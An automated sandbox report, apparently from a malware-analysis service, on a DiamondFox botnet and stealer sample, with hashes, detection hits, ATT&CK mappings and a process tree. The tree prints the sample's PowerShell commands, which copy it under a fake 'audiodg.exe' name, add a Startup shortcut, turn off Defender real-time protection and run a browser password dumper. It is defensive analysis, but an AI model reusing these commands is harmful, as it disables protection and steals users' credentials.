diamondfox | 63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a

Analysis

max time kernel
148s
max time network
147s
platform
windows10_x64
resource
win10v20201028
submitted
19-01-2021 18:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe
Size

579KB
MD5

de4b296cb2891bd1c3ed085ed648a62d
SHA1

73aaa5d6869bd25abb78ba5beb27ec8c5ee71e57
SHA256

63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a
SHA512

122402092f03e9ee35ad0fa5128e4d50795894790f088918d0ca3f6e128d85c8b6b7f64eaecdf6d66b2a8d41f921a1446056129d7b9eb28822afb8eacb20d453

Score

10^/10

diamondfox botnet spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 1 IoCs

Detects DiamondFox payload in file/memory.

Processes:

resource	yara_rule
behavioral2/memory/972-3-0x0000000000400000-0x0000000000470000-memory.dmp	diamondfox

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/2136-82-0x0000000000400000-0x0000000000477000-memory.dmp	WebBrowserPassView
behavioral2/memory/2136-83-0x0000000000447D8A-mapping.dmp	WebBrowserPassView
behavioral2/memory/2136-85-0x0000000000400000-0x0000000000477000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2136-82-0x0000000000400000-0x0000000000477000-memory.dmp	Nirsoft
behavioral2/memory/2136-83-0x0000000000447D8A-mapping.dmp	Nirsoft
behavioral2/memory/2136-85-0x0000000000400000-0x0000000000477000-memory.dmp	Nirsoft
behavioral2/memory/296-87-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/296-88-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral2/memory/296-90-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Executes dropped EXE 3 IoCs

Processes:

audiodg.exeaudiodg.exeaudiodg.exe

pid process

3984 audiodg.exe
2136 audiodg.exe
296 audiodg.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiodg.lnk powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3984	audiodg.exe
2136	audiodg.exe
296	audiodg.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiodg.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

audiodg.exe

description	pid	process	target process
PID 3984 set thread context of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 set thread context of 296	3984	audiodg.exe	audiodg.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exePowershell.exeaudiodg.exeaudiodg.exe

pid	process
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
3868	powershell.exe
3868	powershell.exe
3868	powershell.exe
2296	Powershell.exe
2296	Powershell.exe
2296	Powershell.exe
2136	audiodg.exe
2136	audiodg.exe
2136	audiodg.exe
2136	audiodg.exe
296	audiodg.exe
296	audiodg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exePowershell.exeaudiodg.exe

description	pid	process
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	2296	Powershell.exe
Token: SeDebugPrivilege	296	audiodg.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exeaudiodg.exe

pid process

972 63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe
3984 audiodg.exe

pid	process
972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe
3984	audiodg.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exepowershell.exeaudiodg.exe

description	pid	process	target process
PID 972 wrote to memory of 2092	972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe	powershell.exe
PID 972 wrote to memory of 2092	972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe	powershell.exe
PID 972 wrote to memory of 2092	972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe	powershell.exe
PID 2092 wrote to memory of 3984	2092	powershell.exe	audiodg.exe
PID 2092 wrote to memory of 3984	2092	powershell.exe	audiodg.exe
PID 2092 wrote to memory of 3984	2092	powershell.exe	audiodg.exe
PID 3984 wrote to memory of 3868	3984	audiodg.exe	powershell.exe
PID 3984 wrote to memory of 3868	3984	audiodg.exe	powershell.exe
PID 3984 wrote to memory of 3868	3984	audiodg.exe	powershell.exe
PID 3984 wrote to memory of 2296	3984	audiodg.exe	Powershell.exe
PID 3984 wrote to memory of 2296	3984	audiodg.exe	Powershell.exe
PID 3984 wrote to memory of 2296	3984	audiodg.exe	Powershell.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 2136	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe
PID 3984 wrote to memory of 296	3984	audiodg.exe	audiodg.exe

C:\Users\Admin\AppData\Local\Temp\63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe
"C:\Users\Admin\AppData\Local\Temp\63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Copy-Item -Path 'C:\Users\Admin\AppData\Local\Temp\63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe' -Destination 'C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2092

C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
"C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $shell = New-Object -ComObject WScript.Shell;$shortcut = $shell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiodg.lnk');$shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe';$shortcut.Save()
4⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell Set-MpPreference -DisableRealtimeMonitoring 1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
/scomma C:\Users\Admin\AppData\Local\gadoiud\1.log
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2136

C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
/scomma C:\Users\Admin\AppData\Local\gadoiud\2.log
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
e71a0a7e48b10bde0a9c54387762f33e

SHA1
fed75947f1163b00096e24a46e67d9c21e7eeebd

SHA256
83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

SHA512
394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc

SHA1
75c07243f9cb80a9c7aed2865f9c5192cc920e7e

SHA256
91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

SHA512
db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
77f7c2ca2566ce4b5873d0d085607277

SHA1
0f6251e2dd21afd2df5492d8f9c4d2956db885d6

SHA256
412a781850a081390f224bac3ff900adf26d7d09894a7a153dc4aee8d16e95d3

SHA512
333425fa998536d256c1e5726261cc042b82b3d8f262ee59e267cf83fc81a6125d2c6a4b1859c8161c2a7759943bf2ccfcdab12f5916515c90563a5983930a29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ea83f167e822d1061ba4f34586050425

SHA1
dcf9f9e060476d2ba22245e7ed993cbeda35062f

SHA256
9d31addede9edab35ca581691d55d2ed129222a502f83d038d87466c92327301

SHA512
bdcafb1cb0238fac5d66e0d5961f9402cf4f04fb0b4b1cb1d23f8491eceab03f29098044ec8ed420e99879ba0969de4af4b07ec22feedb1b4d14530db9adc07b

Download Submit
C:\Users\Admin\AppData\Local\gadoiud\1.log
MD5
c899085ae52e1212260bd31f38dd7cad

SHA1
482ebdfa75ac934e022670beea5258f08863abcb

SHA256
20c8330e6a19bd31b379f102f9ede1fd315fc763dd1d805b310ade04860d69cf

SHA512
3139ffb0e6c9ac312dd38aed58953b5249c8374529972553353e40bef982376b71f7a3551abd860f17443708d032c03feb2795860510a33df3abd35aebda155e

Download Submit
C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
MD5
de4b296cb2891bd1c3ed085ed648a62d

SHA1
73aaa5d6869bd25abb78ba5beb27ec8c5ee71e57

SHA256
63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a

SHA512
122402092f03e9ee35ad0fa5128e4d50795894790f088918d0ca3f6e128d85c8b6b7f64eaecdf6d66b2a8d41f921a1446056129d7b9eb28822afb8eacb20d453

Download Submit
C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
MD5
de4b296cb2891bd1c3ed085ed648a62d

SHA1
73aaa5d6869bd25abb78ba5beb27ec8c5ee71e57

SHA256
63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a

SHA512
122402092f03e9ee35ad0fa5128e4d50795894790f088918d0ca3f6e128d85c8b6b7f64eaecdf6d66b2a8d41f921a1446056129d7b9eb28822afb8eacb20d453

Download Submit
C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
MD5
de4b296cb2891bd1c3ed085ed648a62d

SHA1
73aaa5d6869bd25abb78ba5beb27ec8c5ee71e57

SHA256
63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a

SHA512
122402092f03e9ee35ad0fa5128e4d50795894790f088918d0ca3f6e128d85c8b6b7f64eaecdf6d66b2a8d41f921a1446056129d7b9eb28822afb8eacb20d453

Download Submit
C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
MD5
de4b296cb2891bd1c3ed085ed648a62d

SHA1
73aaa5d6869bd25abb78ba5beb27ec8c5ee71e57

SHA256
63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a

SHA512
122402092f03e9ee35ad0fa5128e4d50795894790f088918d0ca3f6e128d85c8b6b7f64eaecdf6d66b2a8d41f921a1446056129d7b9eb28822afb8eacb20d453

Download Submit
memory/296-87-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/296-90-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/296-88-0x0000000000413E10-mapping.dmp

Download
memory/972-3-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/972-2-0x00000000021E0000-0x0000000002250000-memory.dmp

Filesize
448KB

Download
memory/2092-13-0x0000000008290000-0x0000000008291000-memory.dmp

Filesize
4KB

Download
memory/2092-14-0x00000000081B0000-0x00000000081B1000-memory.dmp

Filesize
4KB

Download
memory/2092-20-0x0000000009810000-0x0000000009811000-memory.dmp

Filesize
4KB

Download
memory/2092-21-0x0000000009870000-0x0000000009871000-memory.dmp

Filesize
4KB

Download
memory/2092-22-0x0000000009F40000-0x0000000009F41000-memory.dmp

Filesize
4KB

Download
memory/2092-23-0x000000000AAC0000-0x000000000AAC1000-memory.dmp

Filesize
4KB

Download
memory/2092-18-0x0000000008C50000-0x0000000008C51000-memory.dmp

Filesize
4KB

Download
memory/2092-17-0x0000000008BC0000-0x0000000008BC1000-memory.dmp

Filesize
4KB

Download
memory/2092-16-0x0000000008270000-0x0000000008271000-memory.dmp

Filesize
4KB

Download
memory/2092-27-0x0000000007543000-0x0000000007544000-memory.dmp

Filesize
4KB

Download
memory/2092-15-0x0000000008400000-0x0000000008401000-memory.dmp

Filesize
4KB

Download
memory/2092-19-0x0000000009920000-0x0000000009921000-memory.dmp

Filesize
4KB

Download
memory/2092-12-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

Filesize
4KB

Download
memory/2092-11-0x0000000007542000-0x0000000007543000-memory.dmp

Filesize
4KB

Download
memory/2092-10-0x0000000007B80000-0x0000000007B81000-memory.dmp

Filesize
4KB

Download
memory/2092-9-0x0000000007540000-0x0000000007541000-memory.dmp

Filesize
4KB

Download
memory/2092-6-0x0000000000000000-mapping.dmp

Download
memory/2092-8-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/2092-7-0x0000000073730000-0x0000000073E1E000-memory.dmp

Filesize
6.9MB

Download
memory/2136-83-0x0000000000447D8A-mapping.dmp

Download
memory/2136-82-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2136-85-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2296-66-0x00000000096B0000-0x00000000096E3000-memory.dmp

Filesize
204KB

Download
memory/2296-55-0x0000000001320000-0x0000000001321000-memory.dmp

Filesize
4KB

Download
memory/2296-56-0x0000000001322000-0x0000000001323000-memory.dmp

Filesize
4KB

Download
memory/2296-60-0x0000000007F20000-0x0000000007F21000-memory.dmp

Filesize
4KB

Download
memory/2296-52-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/2296-63-0x00000000083E0000-0x00000000083E1000-memory.dmp

Filesize
4KB

Download
memory/2296-51-0x0000000000000000-mapping.dmp

Download
memory/2296-73-0x00000000093C0000-0x00000000093C1000-memory.dmp

Filesize
4KB

Download
memory/2296-74-0x00000000097E0000-0x00000000097E1000-memory.dmp

Filesize
4KB

Download
memory/2296-75-0x000000007ED80000-0x000000007ED81000-memory.dmp

Filesize
4KB

Download
memory/2296-77-0x0000000001323000-0x0000000001324000-memory.dmp

Filesize
4KB

Download
memory/2296-78-0x0000000009920000-0x0000000009921000-memory.dmp

Filesize
4KB

Download
memory/2296-80-0x0000000009910000-0x0000000009911000-memory.dmp

Filesize
4KB

Download
memory/3868-50-0x0000000004F63000-0x0000000004F64000-memory.dmp

Filesize
4KB

Download
memory/3868-45-0x0000000004F62000-0x0000000004F63000-memory.dmp

Filesize
4KB

Download
memory/3868-44-0x0000000008CA0000-0x0000000008CA1000-memory.dmp

Filesize
4KB

Download
memory/3868-43-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/3868-40-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/3868-34-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/3868-32-0x0000000000000000-mapping.dmp

Download
memory/3984-29-0x0000000000530000-0x00000000005A0000-memory.dmp

Filesize
448KB

Download
memory/3984-24-0x0000000000000000-mapping.dmp

Download